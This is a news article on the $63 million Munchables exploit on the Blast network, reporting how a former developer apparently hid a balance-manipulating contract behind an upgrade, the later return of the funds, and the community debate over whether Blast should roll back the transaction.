Analysts Believe Munchables’ $63M Exploit Was Internally Engineered

Experts believe the Blast-based game’s $63 million hack may have been devised by a North Korean employee.

By: Samuel Haig Loading...

Analysts Believe Munchables’ $63M Exploit Was Internally Engineered

Munchables, a prominent web3 game and farm on the Blast Layer 2 network, has suffered a $63 million hack, igniting debate about whether the Blast team should roll back the malicious transaction.

The incident took place on March 26, with Munchables tweeting that it is actively tracking the flow of funds stolen in the exploit. Two-thirds of Munchables’ total value locked (TVL) was stolen as a result of the incident, with the protocol’s TVL sliding from $96.2 million to $34 million, according to DeFi Llama.

ZachXBT, a popular web3 analyst and sleuth, identified the attacker’s wallet on-chain. The address currently holds 17,412.65 Ether.

Pacman, Blast's pseudonymous founder and contributor, later tweeted that the funds were secured after the perpetrator voluntarily returned the assets. The hacker was confirmed to be a former Munchables developer.

Inside job

0xQuit, a Solidity auditor, said the protocol’s lock contract was engineered to lay the groundwork for the exploit prior to Munchables’ deployment.

They said the contract was originally unverified and written to allow the attacker to assign themselves a deposited balance of up to 1 million ETH, before being upgraded to a new implementation that concealed the vulnerability.

“If you never knew about the original implementation, the contract would look just fine” 0xQuit tweeted. “[The] scammer used manual manipulation of storage slots to assign himself an enormous Ether balance before changing the contract implementation to one that appears legit. Then he simply withdrew that balance once TVL was juicy enough.”

ZachXBT speculated that the attack may have been engineered by a North Korean developer hired by the Munchables team.

Onlookers debate network rollback

The incident gave rise to fervent discussions regarding how Blast should respond, with Blast possessing the ability to reverse the malicious transaction and exercising control over its bridge to the Ethereum mainnet — which cannot be bypassed by third-party bridges.

0xQuit tweeted that third-party Blast bridges appear to have been disabled to protect their operators against potential losses. “Makes sense given the uncertainty,” 0xQuit tweeted. “If Blast rolls back… these bridges are out of pocket on everything they paid out to bridgers, and bridgers would double their money.”

DCF God, a popular crypto trader, said rolling back the exploit would not comprise a major departure from Blast’s existing ethos, with the network already exhibiting a centralized architecture.

“Don't think it's too crazy for Blast to freeze the underlying ETH from the Munchables exploit,” DCF God said. “It's not like other L2s because they manage the underlying deposits already.”

However, many onlookers warned that reversing transactions would set a poor precedent for the project moving forward.

“Technically, the Blast team could recover the $62m lost in the Munchables exploit since they control the bridge contract that holds the bridged ETH/stETH,” tweeted 0xCygaar, a contributor to Frame. “I don't think any rollup has done something like this on mainnet yet but the bridge contracts are upgradeable… It wouldn't set a good precedent for future exploits/issues, but it is possible.“

But many web3 users said they would prefer for Blast to roll back the chain to return assets to victims, despite the risks and centralization concerns associated with such a move.

“Blast can get $62m in stolen ETH back because it controls the bridge to mainnet,” tweeted Beanie, an NFT investor. “There’s literally no reason for Blast not to act for the benefit of its users.”

Brentsketit, a crypto commentator and investor, said they would feel “safer” engaging with a network that responds to exploits in a centralized manner. “As anti-crypto as that sounds, but it seems crypto is nowhere close to its root anymore,” they tweeted.

Exploit pours cold water over Blast

The incident served as a dampener following Blast’s impressive but controversial mainnet launch four weeks ago.

Blast deployed as the third-largest L2 with a TVL of more than $2 billion owing to accepting deposits to a one-way bridging contract since announcing its launch plans in November.

However, the launch campaign, which offered users yields via third-party protocols in addition to Blast points, was criticized for demanding trust from users despite failing to publish any code or audits alongside leveraging incentive structures borrowed from multi-level-marketing schemes.

Blast is now the third-ranked L2 with a network TVL of $2.7 billion, according to L2beat.